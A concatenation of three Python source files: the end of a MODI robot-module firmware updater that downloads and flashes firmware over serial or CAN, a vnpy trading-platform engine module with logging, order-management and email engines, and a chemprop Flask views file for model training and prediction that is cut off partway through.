self.update_in_progress = False
self.modules_to_update = []
self.modules_updated = []
self.network_id = None
self.ui = None
self.request_network_id()
def set_ui(self, ui):
self.ui = ui
def request_network_id(self):
self.__conn.send_nowait(
parse_message(0x28, 0xFFF, 0xFFF, (0xFF, 0x0F))
)
def __assign_network_id(self, sid, data):
module_uuid = unpack_data(data, (6, 1))[0]
module_type = get_module_type_from_uuid(module_uuid)
if module_type == 'network':
self.network_id = sid
def update_module_firmware(self, update_network_base=False):
if update_network_base:
self.update_network_base = True
# Retrieve the network id only and update it accordingly
timeout, delay = 3, 0.1
while not self.network_id:
if timeout <= 0:
if not self.update_in_progress:
print(
'Could not retrieve network id, '
'broadcast id will be used instead.'
)
self.network_id = 0xFFF
break
self.request_network_id()
timeout -= delay
time.sleep(delay)
"""
If network id could not be retrieved, it's probably the case that
the network is already in the update progress. As such, we skip to
request to update the base firmware.
"""
if self.network_id != 0xFFF:
print(
f'Sending a request to update firmware of network '
f'({self.network_id})'
)
self.request_to_update_firmware(
self.network_id, is_network=True
)
else:
self.reset_state()
for target in self.__target_ids:
self.request_to_update_firmware(target)
self.update_event.wait()
print("Module firmwares have been updated!")
self.close()
def close(self):
self.__running = False
time.sleep(0.5)
self.__conn.close_conn()
def __open_conn(self):
if is_on_pi() and self.conn_type == 'can':
return im('modi.task.can_task').CanTask()
else:
return im('modi.task.ser_task').SerTask()
def reinitialize_serial_connection(self):
print('Temporally disconnecting the serial connection...')
self.close()
print('Re-init serial connection for the update, in 2 seconds...')
time.sleep(2)
self.__conn = self.__open_conn()
self.__conn.open_conn()
self.__running = True
th.Thread(target=self.__read_conn, daemon=True).start()
def reset_state(self, update_in_progress: bool = False) -> None:
self.response_flag = False
self.response_error_flag = False
self.response_error_count = 0
self.update_in_progress = False
if not update_in_progress:
print('Make sure you have connected module(s) to update')
print("Resetting firmware updater's state")
self.modules_to_update = []
self.modules_updated = []
def request_to_update_firmware(self, module_id, is_network=False) -> None:
# Remove firmware of MODI modules (Removes EndFlash)
if is_network:
firmware_update_message = self.__set_network_state(
module_id, 4, Module.PNP_OFF
)
self.__conn.send_nowait(firmware_update_message)
self.reinitialize_serial_connection()
else:
firmware_update_message = self.__set_module_state(
module_id, Module.UPDATE_FIRMWARE, Module.PNP_OFF
)
self.__conn.send_nowait(firmware_update_message)
print('Firmware update has been requested')
def check_to_update_firmware(self, module_id: int) -> None:
firmware_update_ready_message = self.__set_module_state(
module_id, Module.UPDATE_FIRMWARE_READY, Module.PNP_OFF
)
self.__conn.send_nowait(firmware_update_ready_message)
def add_to_waitlist(self, module_id: int, module_type: str) -> None:
# Check if input module already exist in the list
for curr_module_id, curr_module_type in self.modules_to_update:
if module_id == curr_module_id:
return
# Check if module is already updated
for curr_module_id, curr_module_type in self.modules_updated:
if module_id == curr_module_id:
return
print(f"Adding {module_type} ({module_id}) to waiting list..."
f"{' ' * 60}")
# Add the module to the waiting list
module_elem = module_id, module_type
self.modules_to_update.append(module_elem)
def update_module(self, module_id: int, module_type: str) -> None:
if self.update_in_progress:
return
self.update_in_progress = True
updater_thread = th.Thread(
target=self.__update_firmware, args=(module_id, module_type)
)
updater_thread.daemon = True
updater_thread.start()
def update_response(self, response: bool,
is_error_response: bool = False) -> None:
if not is_error_response:
self.response_flag = response
else:
self.response_error_flag = response
def __update_firmware(self, module_id: int, module_type: str) -> None:
self.update_in_progress = True
self.modules_updated.append((module_id, module_type))
# Init base root_path, utilizing local binary files
root_path = (
path.join(
path.dirname(__file__),
'..', 'assets', 'firmware', 'gd32'
)
)
if self.__is_os_update:
if self.ui:
if self.update_network_base:
root_path = (
'https://download.luxrobo.com/modi-network-os'
)
zip_path = path.join(root_path, 'network.zip')
bin_path = 'network.bin'
else:
root_path = (
'https://download.luxrobo.com/modi-skeleton-mobile'
)
zip_path = path.join(root_path, 'skeleton.zip')
bin_path = (
path.join(f'skeleton/{module_type.lower()}.bin')
if module_type != 'env' else
path.join('skeleton/environment.bin')
)
try:
with ur.urlopen(zip_path, timeout=5) as conn:
download_response = conn.read()
except URLError:
raise URLError(
"Failed to download firmware. Check your internet."
)
zip_content = zipfile.ZipFile(
io.BytesIO(download_response), 'r'
)
bin_buffer = zip_content.read(bin_path)
else:
bin_path = path.join(root_path, f"{module_type.lower()}.bin")
with open(bin_path, 'rb') as bin_file:
bin_buffer = bin_file.read()
# Init metadata of the bytes loaded
page_size = 0x800
flash_memory_addr = 0x08000000
bin_size = sys.getsizeof(bin_buffer)
bin_begin = 0x4800
bin_end = bin_size - ((bin_size - bin_begin) % page_size)
page_offset = 0
for page_begin in range(bin_begin, bin_end + 1, page_size):
progress = 100 * page_begin // bin_end
print(
f"\rUpdating {module_type} ({module_id}) "
f"{self.__progress_bar(page_begin, bin_end)} "
f"{progress}%", end=''
)
page_end = page_begin + page_size
curr_page = bin_buffer[page_begin:page_end]
# Skip current page if empty
if not sum(curr_page):
continue
# Erase page (send erase request and receive its response)
erase_page_success = self.send_firmware_command(
oper_type="erase", module_id=module_id, crc_val=0,
dest_addr=flash_memory_addr,
page_addr=page_begin + page_offset
)
if not erase_page_success:
page_begin -= page_size
continue
# Copy current page data to the module's memory
checksum = 0
for curr_ptr in range(0, page_size, 8):
if page_begin + curr_ptr >= bin_size:
break
curr_data = curr_page[curr_ptr:curr_ptr + 8]
checksum = self.send_firmware_data(
module_id,
seq_num=curr_ptr // 8,
bin_data=curr_data,
crc_val=checksum
)
self.__delay(0.002)
# CRC on current page (send CRC request / receive CRC response)
crc_page_success = self.send_firmware_command(
oper_type="crc", module_id=module_id, crc_val=checksum,
dest_addr=flash_memory_addr,
page_addr=page_begin + page_offset
)
if not crc_page_success:
page_begin -= page_size
time.sleep(0.01)
print(
f"\rUpdating {module_type} ({module_id}) "
f"{self.__progress_bar(1, 1)} 100%"
)
# Get version info from version_path, using appropriate methods
version_info, version_file = None, 'version.txt'
if self.ui:
version_path = path.join(root_path, version_file)
for line in ur.urlopen(version_path, timeout=5):
version_info = line.decode('utf-8').lstrip('v')
else:
if self.update_network_base:
version_file = 'base_' + version_file
version_path = path.join(root_path, version_file)
with open(version_path) as version_file:
version_info = version_file.readline().lstrip('v').rstrip('\n')
version_digits = [int(digit) for digit in version_info.split('.')]
""" Version number is formed by concatenating all three version bits
e.g. 2.2.4 -> 010 00010 00000100 -> 0100 0010 0000 0100
"""
version = (
version_digits[0] << 13 |
version_digits[1] << 8 |
version_digits[2]
)
# Set end-flash data to be sent at the end of the firmware update
end_flash_data = bytearray(8)
end_flash_data[0] = 0xAA
end_flash_data[6] = version & 0xFF
end_flash_data[7] = (version >> 8) & 0xFF
self.send_end_flash_data(module_type, module_id, end_flash_data)
print(
f'Version info (v{version_info}) has been written to its firmware!'
)
# Firmware update flag down, resetting used flags
print(f'Firmware update is done for {module_type} ({module_id})')
self.reset_state(update_in_progress=True)
if self.modules_to_update:
print("Processing the next module to update the firmware..")
next_module_id, next_module_type = self.modules_to_update.pop(0)
self.__update_firmware(next_module_id, next_module_type)
else:
# Reboot all connected modules
reboot_message = self.__set_module_state(
0xFFF, Module.REBOOT, Module.PNP_OFF
)
self.__conn.send_nowait(reboot_message)
print("Reboot message has been sent to all connected modules")
# self.reset_state()
if self.update_network_base:
self.reinitialize_serial_connection()
time.sleep(0.5)
time.sleep(1)
self.update_in_progress = False
self.update_event.set()
@staticmethod
def __delay(span):
init_time = time.perf_counter()
while time.perf_counter() - init_time < span:
pass
return
@staticmethod
def __set_network_state(destination_id: int, module_state: int,
pnp_state: int) -> str:
message = dict()
message["c"] = 0xA4
message["s"] = 0
message["d"] = destination_id
state_bytes = bytearray(2)
state_bytes[0] = module_state
state_bytes[1] = pnp_state
message["b"] = b64encode(bytes(state_bytes)).decode("utf-8")
message["l"] = 2
return json.dumps(message, separators=(",", ":"))
@staticmethod
def __set_module_state(destination_id: int, module_state: int,
pnp_state: int) -> str:
message = dict()
message["c"] = 0x09
message["s"] = 0
message["d"] = destination_id
state_bytes = bytearray(2)
state_bytes[0] = module_state
state_bytes[1] = pnp_state
message["b"] = b64encode(bytes(state_bytes)).decode("utf-8")
message["l"] = 2
return json.dumps(message, separators=(",", ":"))
# TODO: Use retry decorator here
def send_end_flash_data(self, module_type: str, module_id: int,
end_flash_data: bytearray) -> None:
# Write end-flash data until success
end_flash_success = False
while not end_flash_success:
# Erase page (send erase request and receive erase response)
erase_page_success = self.send_firmware_command(
oper_type="erase", module_id=module_id, crc_val=0,
dest_addr=0x0800F800
)
# TODO: Remove magic number of dest_addr above, try using flash_mem
if not erase_page_success:
continue
# Send data
checksum = self.send_firmware_data(
module_id, seq_num=0, bin_data=end_flash_data, crc_val=0
)
# CRC on current page (send CRC request and receive CRC response)
crc_page_success = self.send_firmware_command(
oper_type="crc", module_id=module_id, crc_val=checksum,
dest_addr=0x0800F800
)
if not crc_page_success:
continue
end_flash_success = True
# print(f"End flash is written for {module_type} ({module_id})")
def get_firmware_command(self, module_id: int, rot_stype: int,
rot_scmd: int, crc32: int, page_addr: int) -> str:
message = dict()
message["c"] = 0x0D
""" SID is 12-bits length in MODI CAN.
To fully utilize its capacity, we split 12-bits into 4 and 8 bits.
First 4 bits include rot_scmd information.
And the remaining bits represent rot_stype.
"""
message["s"] = (rot_scmd << 8) | rot_stype
message["d"] = module_id
""" The firmware command data to be sent is 8-bytes length.
Where the first 4 bytes consist of CRC-32 information.
Last 4 bytes represent page address information.
"""
crc32_and_page_addr_data = bytearray(8)
for i in range(4):
crc32_and_page_addr_data[i] = crc32 & 0xFF
crc32 >>= 8
crc32_and_page_addr_data[4 + i] = page_addr & 0xFF
page_addr >>= 8
message["b"] = b64encode(
bytes(crc32_and_page_addr_data)
).decode("utf-8")
message["l"] = 8
return json.dumps(message, separators=(",", ":"))
def get_firmware_data(self, module_id: int, seq_num: int,
bin_data: bytes) -> str:
message = dict()
message["c"] = 0x0B
message["s"] = seq_num
message["d"] = module_id
message["b"] = b64encode(bytes(bin_data)).decode("utf-8")
message["l"] = 8
return json.dumps(message, separators=(",", ":"))
def calc_crc32(self, data: bytes, crc: int) -> int:
crc ^= int.from_bytes(data, byteorder='little', signed=False)
for _ in range(32):
if crc & (1 << 31) != 0:
crc = (crc << 1) ^ 0x4C11DB7
else:
crc <<= 1
crc &= 0xFFFFFFFF
return crc
def calc_crc64(self, data: bytes, checksum: int) -> int:
checksum = self.calc_crc32(data[:4], checksum)
checksum = self.calc_crc32(data[4:], checksum)
return checksum
def send_firmware_command(self, oper_type: str, module_id: int,
crc_val: int, dest_addr: int,
page_addr: int = 0) -> bool:
rot_scmd = 2 if oper_type == "erase" else 1
# Send firmware command request
request_message = self.get_firmware_command(
module_id, 1, rot_scmd, crc_val, page_addr=dest_addr + page_addr
)
self.__conn.send_nowait(request_message)
return self.receive_command_response()
def receive_command_response(self, response_delay: float = 0.001,
response_timeout: float = 5,
max_response_error_count: int = 75) -> bool:
# Receive firmware command response
response_wait_time = 0
while not self.response_flag:
# Calculate timeout at each iteration
time.sleep(response_delay)
response_wait_time += response_delay
# If timed-out
if response_wait_time > response_timeout:
raise Exception("Response timed-out")
# If error is raised
if self.response_error_flag:
self.response_error_count += 1
if self.response_error_count > max_response_error_count:
raise Exception("Response Errored")
self.response_error_flag = False
return False
self.response_flag = False
return True
def send_firmware_data(self, module_id: int, seq_num: int, bin_data: bytes,
crc_val: int) -> int:
# Send firmware data
data_message = self.get_firmware_data(
module_id, seq_num=seq_num, bin_data=bin_data
)
self.__conn.send_nowait(data_message)
# Calculate crc32 checksum twice
checksum = self.calc_crc64(data=bin_data, checksum=crc_val)
return checksum
def __progress_bar(self, current: int, total: int) -> str:
curr_bar = 50 * current // total
rest_bar = 50 - curr_bar
return f"[{'=' * curr_bar}>{'.' * rest_bar}]"
def __read_conn(self):
while True:
self.__handle_message()
time.sleep(0.001)
if not self.__running:
break
def __handle_message(self):
msg = self.__conn.recv()
if not msg:
return
try:
ins, sid, did, data, length = decode_message(msg)
except json.JSONDecodeError:
return
command = {
0x05: self.__assign_network_id,
0x0A: self.__update_warning,
0x0C: self.__update_firmware_state
}.get(ins)
if command:
command(sid, data)
def __update_firmware_state(self, sid: int, data: str):
message_decoded = unpack_data(data, (4, 1))
stream_state = message_decoded[1]
if stream_state == self.CRC_ERROR:
self.update_response(response=True, is_error_response=True)
elif stream_state == self.CRC_COMPLETE:
self.update_response(response=True)
elif stream_state == self.ERASE_ERROR:
self.update_response(response=True, is_error_response=True)
elif stream_state == self.ERASE_COMPLETE:
self.update_response(response=True)
def __update_warning(self, sid: int, data: str) -> None:
module_uuid = unpack_data(data, (6, 1))[0]
warning_type = unpack_data(data, (6, 1))[1]
# If warning shows current module works fine, return immediately
if not warning_type:
return
module_id = sid
module_type = get_module_type_from_uuid(module_uuid)
if warning_type == 1:
self.check_to_update_firmware(module_id)
elif warning_type == 2:
# Note that more than one warning type 2 message can be received
if self.update_in_progress:
self.add_to_waitlist(module_id, module_type)
else:
self.update_module(module_id, module_type)
|
engine.py
|
"""
"""
import logging
import smtplib
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import CancelRequest, LogData, OrderRequest, SubscribeRequest
from .setting import SETTINGS
from .utility import Singleton, get_folder_path
class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways = {}
self.engines = {}
self.apps = {}
self.init_engines()
def add_engine(self, engine_class: Any):
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
def add_gateway(self, gateway_class: BaseGateway):
"""
Add gateway.
"""
gateway = gateway_class(self.event_engine)
self.gateways[gateway.gateway_name] = gateway
def add_app(self, app_class: BaseApp):
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
self.add_engine(app.engine_class)
def init_engines(self):
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str):
"""
Put log event with specific message.
"""
log = LogData(msg=msg)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def get_gateway(self, gateway_name: str):
"""
Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_log(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str):
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_log(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str):
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
return None
def get_all_gateway_names(self):
"""
Get all names of gatewasy added in main engine.
"""
return list(self.gateways.keys())
def get_all_apps(self):
"""
Get all app objects.
"""
return list(self.apps.values())
def connect(self, setting: dict, gateway_name: str):
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.connect(setting)
def subscribe(self, req: SubscribeRequest, gateway_name: str):
"""
Subscribe tick data update of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
def send_order(self, req: OrderRequest, gateway_name: str):
"""
Send new order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str):
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_order(req)
def close(self):
"""
Make sure every gateway and app is closed properly before
programme exit.
"""
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
class BaseEngine(ABC):
"""
Abstract class for implementing an function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
__metaclass__ = Singleton
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level = SETTINGS["log.level"]
self.logger = logging.getLogger("VN Trader")
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self):
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self):
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self):
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y%m%d")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
file_handler = logging.FileHandler(
file_path, mode="w", encoding="utf8"
)
file_handler.setLevel(self.level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self):
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event):
"""
Output log event data with logging function.
"""
log = event.data
self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks = {}
self.orders = {}
self.trades = {}
self.positions = {}
self.accounts = {}
self.contracts = {}
self.active_orders = {}
self.add_function()
self.register_event()
def add_function(self):
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_contract = self.get_contract
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event):
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
def process_order_event(self, event: Event):
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
# Otherwise, pop inactive order from in dict
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event):
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event):
""""""
position = event.data
self.positions[position.vt_positionid] = position
def process_account_event(self, event: Event):
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event):
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
def get_tick(self, vt_symbol):
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_order(self, vt_orderid):
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid):
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid):
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid):
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol):
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self):
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self):
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self):
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self):
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self):
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self):
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = ""):
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread = Thread(target=self.run)
self.queue = Queue()
self.active = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = ""):
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = SETTINGS["email.receiver"]
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self):
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self):
""""""
self.active = True
self.thread.start()
def close(self):
""""""
if not self.active:
return
self.active = False
self.thread.join()
|
views.py
|
"""Defines a number of routes/views for the flask app."""
from functools import wraps
import io
import os
import sys
import shutil
from tempfile import TemporaryDirectory, NamedTemporaryFile
import time
from typing import Callable, List, Tuple
import multiprocessing as mp
import zipfile
from flask import json, jsonify, redirect, render_template, request, send_file, send_from_directory, url_for
import numpy as np
from rdkit import Chem
from werkzeug.utils import secure_filename
from chemprop.web.app import app, db
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from chemprop.args import PredictArgs, TrainArgs
from chemprop.constants import MODEL_FILE_NAME, TRAIN_LOGGER_NAME
from chemprop.data import get_data, get_header, get_smiles, get_task_names, validate_data
from chemprop.train import make_predictions, run_training
from chemprop.utils import create_logger, load_task_names, load_args
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
def check_not_demo(func: Callable) -> Callable:
"""
View wrapper, which will redirect request to site
homepage if app is run in DEMO mode.
:param func: A view which performs sensitive behavior.
:return: A view with behavior adjusted based on DEMO flag.
"""
@wraps(func)
def decorated_function(*args, **kwargs):
if app.config['DEMO']:
return redirect(url_for('home'))
return func(*args, **kwargs)
return decorated_function
def progress_bar(args: TrainArgs, progress: mp.Value):
"""
Updates a progress bar displayed during training.
:param args: Arguments.
:param progress: The current progress.
"""
# no code to handle crashes in model training yet, though
current_epoch = -1
while current_epoch < args.epochs - 1:
if os.path.exists(os.path.join(args.save_dir, 'verbose.log')):
with open(os.path.join(args.save_dir, 'verbose.log'), 'r') as f:
content = f.read()
if 'Epoch ' + str(current_epoch + 1) in content:
current_epoch += 1
progress.value = (current_epoch + 1) * 100 / args.epochs
else:
pass
time.sleep(0)
def find_unused_path(path: str) -> str:
"""
Given an initial path, finds an unused path by appending different numbers to the filename.
:param path: An initial path.
:return: An unused path.
"""
if not os.path.exists(path):
return path
base_name, ext = os.path.splitext(path)
i = 2
while os.path.exists(path):
path = base_name + str(i) + ext
i += 1
return path
def name_already_exists_message(thing_being_named: str, original_name: str, new_name: str) -> str:
"""
Creates a message about a path already existing and therefore being renamed.
:param thing_being_named: The thing being renamed (ex. Data, Checkpoint).
:param original_name: The original name of the object.
:param new_name: The new name of the object.
:return: A string with a message about the changed name.
"""
return f'{thing_being_named} "{original_name} already exists. ' \
f'Saving to "{new_name}".'
def get_upload_warnings_errors(upload_item: str) -> Tuple[List[str], List[str]]:
"""
Gets any upload warnings passed along in the request.
:param upload_item: The thing being uploaded (ex. Data, Checkpoint).
:return: A tuple with a list of warning messages and a list of error messages.
"""
warnings_raw = request.args.get(f'{upload_item}_upload_warnings')
errors_raw = request.args.get(f'{upload_item}_upload_errors')
warnings = json.loads(warnings_raw) if warnings_raw is not None else None
errors = json.loads(errors_raw) if errors_raw is not None else None
return warnings, errors
def format_float(value: float, precision: int = 4) -> str:
"""
Formats a float value to a specific precision.
:param value: The float value to format.
:param precision: The number of decimal places to use.
:return: A string containing the formatted float.
"""
return f'{value:.{precision}f}'
def format_float_list(array: List[float], precision: int = 4) -> List[str]:
"""
Formats a list of float values to a specific precision.
:param array: A list of float values to format.
:param precision: The number of decimal places to use.
:return: A list of strings containing the formatted floats.
"""
return [format_float(f, precision) for f in array]
@app.route('/receiver', methods=['POST'])
@check_not_demo
def receiver():
"""Receiver monitoring the progress of training."""
return jsonify(progress=PROGRESS.value, training=TRAINING)
@app.route('/')
def home():
"""Renders the home page."""
return render_template('home.html', users=db.get_all_users())
@app.route('/create_user', methods=['GET', 'POST'])
@check_not_demo
def create_user():
"""
If a POST request is made, creates a new user.
Renders the create_user page.
"""
if request.method == 'GET':
return render_template('create_user.html', users=db.get_all_users())
new_name = request.form['newUserName']
if new_name != None:
db.insert_user(new_name)
return redirect(url_for('create_user'))
def render_train(**kwargs):
"""Renders the train page with specified kwargs."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('train.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/train', methods=['GET', 'POST'])
@check_not_demo
def train():
"""Renders the train page and performs training if request method is POST."""
global PROGRESS, TRAINING
warnings, errors = [], []
if request.method == 'GET':
return render_train()
# Get arguments
data_name, epochs, ensemble_size, checkpoint_name = \
request.form['dataName'], int(request.form['epochs']), \
int(request.form['ensembleSize']), request.form['checkpointName']
gpu = request.form.get('gpu')
data_path = os.path.join(app.config['DATA_FOLDER'], f'{data_name}.csv')
dataset_type = request.form.get('datasetType', 'regression')
use_progress_bar = request.form.get('useProgressBar', 'True') == 'True'
# Create and modify args
args = TrainArgs().parse_args([
'--data_path', data_path,
'--dataset_type', dataset_type,
'--epochs', str(epochs),
'--ensemble_size', str(ensemble_size),
])
# Get task names
args.task_names = get_task_names(path=data_path, smiles_columns=[None])
# Check if regression/classification selection matches data
data = get_data(path=data_path, smiles_columns=[None])
#set the number of molecules through the length of the smiles_columns for now, we need to add an option to the site later
targets = data.targets()
unique_targets = {target for row in targets for target in row if target is not None}
if dataset_type == 'classification' and len(unique_targets - {0, 1}) > 0:
errors.append('Selected classification dataset but not all labels are 0 or 1. Select regression instead.')
return render_train(warnings=warnings, errors=errors)
if dataset_type == 'regression' and unique_targets <= {0, 1}:
errors.append('Selected regression dataset but all labels are 0 or 1. Select classification instead.')
return render_train(warnings=warnings, errors=errors)
if gpu is not None:
if gpu == 'None':
args.cuda = False
else:
args.gpu = int(gpu)
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt_id, ckpt_name = db.insert_ckpt(checkpoint_name,
current_user,
args.dataset_type,
args.epochs,
args.ensemble_size,
len(targets))
with TemporaryDirectory() as temp_dir:
args.save_dir = temp_dir
if use_progress_bar:
process = mp.Process(target=progress_bar, args=(args, PROGRESS))
process.start()
TRAINING = 1
# Run training
logger = create_logger(name=TRAIN_LOGGER_NAME, save_dir=args.save_dir, quiet=args.quiet)
task_scores = run_training(args, data, logger)[args.metrics[0]]
if use_progress_bar:
process.join()
# Reset globals
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
# Check if name overlap
if checkpoint_name != ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', checkpoint_name, ckpt_name))
# Move models
for root, _, files in os.walk(args.save_dir):
for fname in files:
if fname.endswith('.pt'):
model_id = db.insert_model(ckpt_id)
save_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
shutil.move(os.path.join(args.save_dir, root, fname), save_path)
return render_train(trained=True,
metric=args.metric,
num_tasks=len(args.task_names),
task_names=args.task_names,
task_scores=format_float_list(task_scores),
mean_score=format_float(np.mean(task_scores)),
warnings=warnings,
errors=errors)
def render_predict(**kwargs):
"""Renders the predict page with specified kwargs"""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('predict.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/predict', methods=['GET', 'POST'])
def predict():
"""Renders the predict page and makes predictions if the method is POST."""
if request.method == 'GET':
return render_predict()
# Get arguments
ckpt_id = request.form['checkpointName']
if request.form['textSmiles'] != '':
smiles = request.form['textSmiles'].split()
elif request.form['drawSmiles'] != '':
smiles = [request.form['drawSmiles']]
else:
# Upload data file with SMILES
data = request.files['data']
data_name = secure_filename(data.filename)
